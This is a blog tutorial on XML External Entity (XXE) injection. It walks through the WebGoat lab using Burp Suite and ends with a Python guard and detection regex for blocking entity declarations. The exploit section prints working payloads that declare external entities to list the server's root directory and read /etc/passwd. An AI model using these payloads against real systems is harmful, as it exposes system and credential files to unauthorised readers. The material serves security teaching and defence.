How to exploit XXE vulnerabilities?

January 25, 2018

Hi everyone. In this blog, we are going to discuss a critical web application vulnerability known as XML External Entity injection, also known as XXE. XXE sits at the 4th position of the OWASP Top 10 for 2017.

What is XXE actually?

XXE vulnerabilities exploit how an application parses XML input: the attack targets the XML parser itself with the help of external entities. If you are not yet comfortable with XML, please read up on it first and then continue with this blog so that the syntax makes sense.

A simple XML document will look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<employee>
  <!-- the child elements of the original example were not preserved; a single name element is shown for illustration -->
  <name>Shanks</name>
</employee>

Here the first line is the XML declaration, which marks the start of the document. All the tags are called elements; here, employee is the root element.

Read more about DTDs and attributes here.

What are External Entities?

An XML entity is a named reference to a piece of content, which may be defined inside the document or fetched from outside it. If the entity is declared and given its value inside the same document, so that nothing needs to be fetched externally, it is called an internal entity. E.g.:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE employee [
<!ELEMENT employee (#PCDATA)>
<!ENTITY name "Shanks">
]>
<employee>&name;</employee>

If instead the entity declaration uses the SYSTEM keyword to point at an external URI, then when the XML parser goes through the document, the resource is fetched through the URI handler and substituted in place of every reference to that entity. Such entities are called external entities.

Practical Example of XXE:

The best way to learn about XXE vulnerabilities is to practice. So open up WebGoat and go to the Parameter Tampering exercise; you will find the XXE mission there. Make sure to start Burp Suite to capture requests. If you have any problems setting up WebGoat with Burp Suite, please see the video here.

The task is to find the vulnerability in the search form and list the root directory. The same weakness can be extended to read the password file and more.

Now, when you enter some random text and check the captured request, you see:

POST /WebGoat/attack?Screen=87365&menu=1700 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/WebGoat/start.mvc
Content-Length: 66
Content-Type: text/plain;charset=UTF-8
Connection: close

<?xml version="1.0"?>

You can see that the form is submitted as XML, so an XML parser is in place on the server. From here you can start playing with different XML inputs to probe for weaknesses in that parser.
Here, we can use external entities. An external entity defined in the DTD is substituted wherever it is referenced inside the form element, and that is what does the trick.

So, capture this request in Burp Suite and replace the XML body with:

<?xml version="1.0"?>
<!DOCTYPE xmlattack [
<!ENTITY sname SYSTEM "file:/">
]>

Here, since we need a directory listing, we have used file:/ as the external URI, and sname is the name of the external entity. If you are familiar with XML syntax, there is nothing fancy about it.

The same attack can be leveraged to read password files, to port scan the internal network, or to cause denial of service.

We just need to change the external URI:

<?xml version="1.0"?>
<!DOCTYPE xmlattack [
<!ENTITY sname SYSTEM "file:///etc/passwd">
]>

The response now contains the contents of the server's /etc/passwd file.

How dangerous is XXE?

XXE vulnerabilities can lead to several different attacks. The first, shown above, is reading configuration files that may contain sensitive information such as usernames and passwords from the server. Port scanning of hosts reachable from the server, remote code execution (depending on the URI handlers the parser supports) and denial of service are also possible through XXE vulnerabilities.

Where to look for XXE vulnerabilities?

XML parsers are very common nowadays, and many of them are still misconfigured. They can be found behind API endpoints and even behind file upload forms that process XML after the upload. You need to find where an XML parser is in use and how it handles different inputs in order to spot any vulnerability present. Companies pay good bounties for reports of these kinds of bugs in bug bounty programs, so it is worth starting with the OWASP material and other resources.
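The misconfiguration described above comes down to a parser that honours DTD entity declarations in attacker-supplied input. The following is an added example, not code from the original post or from WebGoat, showing the defensive side: a guard that refuses any document carrying a DOCTYPE before it reaches the parser (so the entity mechanics from the "What are External Entities?" section can never be triggered), and a simple detection rule for request bodies that declare SYSTEM or PUBLIC entities. The three sample documents, and the function names, are constructed for the example; the payload mirrors the xmlattack/sname declaration used earlier.

```python
# Added example (not from the original post or WebGoat): a parser guard and a
# request-body detection rule for XXE. The sample documents are constructed.
import re
import xml.etree.ElementTree as ET

# Constructed inputs: a plain document, one with a harmless internal entity,
# and one declaring an external entity with a SYSTEM URI (the XXE pattern).
BENIGN = b'<?xml version="1.0"?><employee><name>Shanks</name></employee>'
INTERNAL_ENTITY = (b'<?xml version="1.0"?>'
                   b'<!DOCTYPE employee [<!ENTITY name "Shanks">]>'
                   b'<employee>&name;</employee>')
EXTERNAL_ENTITY = (b'<?xml version="1.0"?>'
                   b'<!DOCTYPE xmlattack [<!ENTITY sname SYSTEM "file:/">]>'
                   b'<employee>&sname;</employee>')

DOCTYPE_RE = re.compile(rb'<!DOCTYPE\b', re.IGNORECASE)
# Matches general (<!ENTITY x SYSTEM ...>) and parameter (<!ENTITY % x SYSTEM ...>)
# entity declarations that point outside the document via SYSTEM or PUBLIC.
EXTERNAL_ENTITY_RE = re.compile(
    rb'<!ENTITY\s+(?:%\s+)?[\w.\-]+\s+(?:SYSTEM|PUBLIC)\b', re.IGNORECASE)


class DoctypeRejected(ValueError):
    """Raised when a document carries a DTD, which the guarded parser refuses."""


def unguarded_parse(data: bytes) -> ET.Element:
    """Parse as-is: internal entities declared in the DTD are expanded,
    which shows that the DTD supplied by the client is being honoured."""
    return ET.fromstring(data)


def guarded_parse(data: bytes) -> ET.Element:
    """Refuse any document with a DOCTYPE before it reaches the parser.

    Rejecting the DTD outright is the simplest hardening for an endpoint
    that never needs one: with no DTD there are no entity declarations,
    so no external entity can be referenced at all.
    """
    if DOCTYPE_RE.search(data):
        raise DoctypeRejected("DOCTYPE is not accepted on this endpoint")
    return ET.fromstring(data)


def classify_body(body: bytes) -> str:
    """Detection label for a request body seen at a proxy or in logs:
    'external-entity' (SYSTEM/PUBLIC declaration), 'doctype' (any DTD),
    or 'clean'."""
    if EXTERNAL_ENTITY_RE.search(body):
        return "external-entity"
    if DOCTYPE_RE.search(body):
        return "doctype"
    return "clean"


if __name__ == "__main__":
    # The unguarded parser substitutes the internal entity: prints "Shanks".
    print(unguarded_parse(INTERNAL_ENTITY).text)
    for doc in (BENIGN, INTERNAL_ENTITY, EXTERNAL_ENTITY):
        print(classify_body(doc))
```

Rejecting every DOCTYPE is deliberately blunt: it also blocks harmless internal entities, which is the right trade-off for a search form or API endpoint that has no business accepting a DTD. Where a DTD is genuinely required, the equivalent fix is to disable external entity resolution in the parser's configuration rather than to filter the input.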

That is all for this post. If you did not understand something or want any help, do comment below. Until then, keep learning and keep hacking. :)